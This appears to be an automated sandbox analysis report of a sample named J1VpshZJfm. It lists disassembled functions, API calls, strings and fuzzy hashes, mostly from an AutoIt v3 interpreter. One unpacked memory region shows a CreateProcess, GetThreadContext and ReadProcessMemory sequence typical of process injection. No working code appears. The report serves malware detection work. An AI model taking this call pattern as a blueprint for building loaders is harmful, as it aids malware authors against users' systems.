Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 682b01b14261103d8400f4a93a6256c00b571da456de0e09bf3c28a530cada84
Instruction ID: 7ee7c0c308bb000f020c2f62f59eb5344916b4fd7636e2996aa7897388701688
Opcode Fuzzy Hash: 682b01b14261103d8400f4a93a6256c00b571da456de0e09bf3c28a530cada84
Instruction Fuzzy Hash: 10412BB1204609BBDF109FB4DC19BBA3795E705706F142129FB01B62E3C6629D05A762

Function 00E93766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMDLINERAW, xrefs: 00E937FB
/AutoIt3OutputDebug, xrefs: 00E93892
/AutoIt3ExecuteLine, xrefs: 00E938A7
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00E937AE
CMDLINE, xrefs: 00E93822
/ErrorStdOut, xrefs: 00E9387D
/AutoIt3ExecuteScript, xrefs: 00E938BC

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: ef08474e620bb4e52493fb2e8b685726bf3b0a432b0f2099ae9ca8a3073ab6c0
Instruction ID: 07a04b7de0ba12cdd70a647f38a6b4debd01020635dae7b39a67ac628ffbe945
Opcode Fuzzy Hash: ef08474e620bb4e52493fb2e8b685726bf3b0a432b0f2099ae9ca8a3073ab6c0
Instruction Fuzzy Hash: F4A17C7291021D9ADF05EBA4DC91EEEB7B8BF15300F44242DF516B7192EF749A09CBA0

Function 018813B8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01881489
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 018816AF

Memory Dump Source

Source File: 00000000.00000002.1605418464.000000000187E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0187E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_187e000_J1VpshZJfm.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction ID: 26fd08c936a089bd523a06d869b7aeecdcda538014f15ef36e0e9a0054250aab
Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
Instruction Fuzzy Hash: 7CA11A74E00209EFDB14DFA8C898BEEBBB5BF48304F148159E506BB280DB759A41CF64

Function 00E939D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E93A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E93A24
ShowWindow.USER32(00000000,?,?), ref: 00E93A38
ShowWindow.USER32(00000000,?,?), ref: 00E93A41

Strings

edit, xrefs: 00E93A1E
AutoIt v3, xrefs: 00E939FB, 00E93A00, 00E93A01

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 201e5694566f4b0ae73aadb350ea3c2a5a4da3538a76eee13762d5573ac400ed
Instruction ID: 104c21d2728d86131d200ec1b351c1bd153080a64dcfdd024c7956f2ecf3b257
Opcode Fuzzy Hash: 201e5694566f4b0ae73aadb350ea3c2a5a4da3538a76eee13762d5573ac400ed
Instruction Fuzzy Hash: FBF03A709407987EEB315763AC18E6B3E7DD7C7F51F01402EBA08A21B0C2A51840EBB0

Function 01881158 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01881048: Sleep.KERNELBASE(000001F4), ref: 01881059

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 018812A5

Strings

IKLQ8KYD7QV7J91SXUVVMAEXXBS, xrefs: 01881308, 0188130B

Memory Dump Source

Source File: 00000000.00000002.1605418464.000000000187E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0187E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_187e000_J1VpshZJfm.jbxd

Similarity

API ID: CreateFileSleep
String ID: IKLQ8KYD7QV7J91SXUVVMAEXXBS
API String ID: 2694422964-177256920
Opcode ID: 29763d4ccdd7ab95ba9a0a0fa37de8a19f68c19348181b293dcefdfcbd35eb51
Instruction ID: 1550848994906a106e020e5e29f535a8699d205dc27c592a4af03679e28708d0
Opcode Fuzzy Hash: 29763d4ccdd7ab95ba9a0a0fa37de8a19f68c19348181b293dcefdfcbd35eb51
Instruction Fuzzy Hash: 13617370D04288DAEF11DBF8C848BDEBBB4AF15304F044199E649BB2C1D7B95B49CB66

Function 00E9407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00ECD3D7

Part of subcall function 00E97BCC: _memmove.LIBCMT ref: 00E97C06

_memset.LIBCMT ref: 00E940FC
_wcscpy.LIBCMT ref: 00E94150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E94160

Strings

Line: , xrefs: 00ECD400

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 6b59224eca920c770642756d2a89860abd088a3798604b4a7a39e143479c2d30
Instruction ID: a3fb4de1b305a761579a4919abafa58c39d126a5f3da8bf64067777841dbebf4
Opcode Fuzzy Hash: 6b59224eca920c770642756d2a89860abd088a3798604b4a7a39e143479c2d30
Instruction Fuzzy Hash: 8731DCB1008308AADB21EB60DC46FDB77D8AF44704F105A1EF685A20E1EB70A64DCB93

Function 00E9686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E94DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F552F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E94E0F

_free.LIBCMT ref: 00ECE263
_free.LIBCMT ref: 00ECE2AA

Part of subcall function 00E96A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E96BAD

Strings

Bad directive syntax error, xrefs: 00ECE292
>>>AUTOIT SCRIPT<<<, xrefs: 00ECE039

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: ab891de7535c8b29446b47298f010add706a85f8e31fc9b3b18907b128776966
Instruction ID: 69029b1cb175ad2517fbfae242cdc9fbdebed10ea168518286e313ecfcf3bfb2
Opcode Fuzzy Hash: ab891de7535c8b29446b47298f010add706a85f8e31fc9b3b18907b128776966
Instruction Fuzzy Hash: C9916E71910219AFCF08EFA4CC91AEEB7B4FF05314B14542EF815BB2A1DB71A916CB50

Function 00E935B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00E935A1,SwapMouseButtons,00000004,?), ref: 00E935D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00E935A1,SwapMouseButtons,00000004,?,?,?,?,00E92754), ref: 00E935F5
RegCloseKey.KERNELBASE(00000000,?,?,00E935A1,SwapMouseButtons,00000004,?,?,?,?,00E92754), ref: 00E93617

Strings

Control Panel\Mouse, xrefs: 00E935D2

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 4d5de3a78c4f7cb9f0822355a64df3b3c3b729c7981c2bb73f9bc1ee0f9f9773
Instruction ID: e1592b2ab038729b7d67d3c80c85e5013bfa0f71f8db06667a04f0d3ef8438c7
Opcode Fuzzy Hash: 4d5de3a78c4f7cb9f0822355a64df3b3c3b729c7981c2bb73f9bc1ee0f9f9773
Instruction Fuzzy Hash: 2E114871910208BFDF20CFA8DC409EEBBB8EF04744F0194A9E805E7211D2719F44A760

Function 01880048 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01880803
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01880899
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018808BB

Memory Dump Source

Source File: 00000000.00000002.1605418464.000000000187E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0187E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_187e000_J1VpshZJfm.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
Instruction ID: 0d0e98493ca4e61f312c715e8beed7651e4a68cd3b5c9cc84abf09fb450a6483
Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
Instruction Fuzzy Hash: 60620B30A14218DBEB24DFA4C850BDEB772EF58304F1091A9E10DEB391E7769E85CB59

Function 00EF955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00E94EE5: _fseek.LIBCMT ref: 00E94EFD

Part of subcall function 00EF9734: _wcscmp.LIBCMT ref: 00EF9824
Part of subcall function 00EF9734: _wcscmp.LIBCMT ref: 00EF9837

_free.LIBCMT ref: 00EF96A2
_free.LIBCMT ref: 00EF96A9
_free.LIBCMT ref: 00EF9714

Part of subcall function 00EB2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00EB9A24), ref: 00EB2D69
Part of subcall function 00EB2D55: GetLastError.KERNEL32(00000000,?,00EB9A24), ref: 00EB2D7B

_free.LIBCMT ref: 00EF971C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 2acf69d0746ca249ab7b2491846a5d4ea724e52352b1390cfa7c0c061fd02ebf
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 505140F1D14218ABDF259F64CC81AAEBBB9EF48300F10149EF249B7281DB715A81CF58

Function 00EB470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EB47A0
__flush.LIBCMT ref: 00EB47C0
__write.LIBCMT ref: 00EB47F3
__flsbuf.LIBCMT ref: 00EB4821

Part of subcall function 00EB8B28: __getptd_noexit.LIBCMT ref: 00EB8B28

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 2b8bf360f9bd15fb87be3c11ac8e6517aa87a2a7deb9a80c7bc8e583e518dcbc
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: B641E3B4A007569BDB1CCEA9C8809EF77A5EF42364B24913EF855A76C2EB70DD41CB40

Function 00E97285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ECEA39
GetOpenFileNameW.COMDLG32(?), ref: 00ECEA83

Part of subcall function 00E94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E94743,?,?,00E937AE,?), ref: 00E94770

Part of subcall function 00EB0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EB07B0

Strings

X, xrefs: 00ECEA51

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 7699c9b550dc0fce3b3063bc8998b9ed69557cfc471508a551d9316e9270a30f
Instruction ID: 6d2cdb645c1c0dd951b1a78b32b051f23a2610bf9e209866ac8d8fd5182bc90c
Opcode Fuzzy Hash: 7699c9b550dc0fce3b3063bc8998b9ed69557cfc471508a551d9316e9270a30f
Instruction Fuzzy Hash: B921C370A10288AFCF01DF94D845BEE7BF9AF49714F00505AE948BB242DBB4598D9FA1

Function 00EF98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00EF98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00EF990F

Strings

aut, xrefs: 00EF9909

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 29ce9c6ffaf1be23c80a04fbaae1a86f463f4c87b40363687bcae3556511a993
Instruction ID: 08c05e97ccd2a48b16cb416da44110893bef4591f18169c708262e866df14d56
Opcode Fuzzy Hash: 29ce9c6ffaf1be23c80a04fbaae1a86f463f4c87b40363687bcae3556511a993
Instruction Fuzzy Hash: E9D05E7958030DABDB509BA0DC0EFDA7B7CE704700F0042B1BE54920A1EAB095999B91

Function 00F0CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e1ce3fe36e38f8982ef0cf0da66e23e7fe1aad4159d5a60bd11643fed84a267
Instruction ID: e14352316779a8756ec25e17ed08e177d279523cb999baf714f4f5a2b1369312
Opcode Fuzzy Hash: 3e1ce3fe36e38f8982ef0cf0da66e23e7fe1aad4159d5a60bd11643fed84a267
Instruction Fuzzy Hash: 4EF15D71A083059FCB14DF28C480A6ABBE5FF89314F54892EF8999B391D730E945DF92

Function 00E9F76F Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 00EB0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EB0193
Part of subcall function 00EB0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00EB019B
Part of subcall function 00EB0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EB01A6
Part of subcall function 00EB0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EB01B1
Part of subcall function 00EB0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00EB01B9
Part of subcall function 00EB0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00EB01C1

Part of subcall function 00EA60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E9F930), ref: 00EA6154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E9F9CD
OleInitialize.OLE32(00000000), ref: 00E9FA4A
CloseHandle.KERNEL32(00000000), ref: 00ED45C8

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: aac80a24f51c6d94d6c0b9308cec2547923c065eb3720c19299dc52b56f39fa0
Instruction ID: feeca7c90c461953e07f2f89bd3de9ba2f8320870ed2692d19194d2448fb6760
Opcode Fuzzy Hash: aac80a24f51c6d94d6c0b9308cec2547923c065eb3720c19299dc52b56f39fa0
Instruction Fuzzy Hash: 3381DFB0915B48CFC784DF79B8706197BE6FB98B07750812AD609CB272E7705489EF10

Function 00E9434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E94370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E94415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E94432

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 8105cfa294c5646fbdcf77434a873a745b1a5103c53841af94ae546194f2d866
Instruction ID: d9ce5ba92093e18cb7b7f131522084d27843f78a511d67c5b654c7097789cac5
Opcode Fuzzy Hash: 8105cfa294c5646fbdcf77434a873a745b1a5103c53841af94ae546194f2d866
Instruction Fuzzy Hash: 0C31D2F0504701DFDB21DF34D884A9BBBF8FB48709F00092EF69AA6291E771A945CB52

Function 00EB571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00EB5733

Part of subcall function 00EBA16B: __NMSG_WRITE.LIBCMT ref: 00EBA192
Part of subcall function 00EBA16B: __NMSG_WRITE.LIBCMT ref: 00EBA19C

__NMSG_WRITE.LIBCMT ref: 00EB573A

Part of subcall function 00EBA1C8: GetModuleFileNameW.KERNEL32(00000000,00F533BA,00000104,?,00000001,00000000), ref: 00EBA25A
Part of subcall function 00EBA1C8: ___crtMessageBoxW.LIBCMT ref: 00EBA308

Part of subcall function 00EB309F: ___crtCorExitProcess.LIBCMT ref: 00EB30A5
Part of subcall function 00EB309F: ExitProcess.KERNEL32 ref: 00EB30AE

Part of subcall function 00EB8B28: __getptd_noexit.LIBCMT ref: 00EB8B28

RtlAllocateHeap.NTDLL(017F0000,00000000,00000001,00000000,?,?,?,00EB0DD3,?), ref: 00EB575F

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: e99109ae186dcbb3eea3aeee32cc2cd4a0a39e69bd86d45257047367766a3a75
Instruction ID: 1550fe860640b672dec91eeb18093c6646bb1d25c6b7dc01da34c25c2487d86a
Opcode Fuzzy Hash: e99109ae186dcbb3eea3aeee32cc2cd4a0a39e69bd86d45257047367766a3a75
Instruction Fuzzy Hash: 7801F176300B25EAD6152B79EC82BEF77C8CF82366F102537F505BB282DEB08C009660

Function 00EF98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00EF9548,?,?,?,?,?,00000004), ref: 00EF98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00EF9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00EF98D1
CloseHandle.KERNEL32(00000000,?,00EF9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00EF98D8

Memory Dump Source

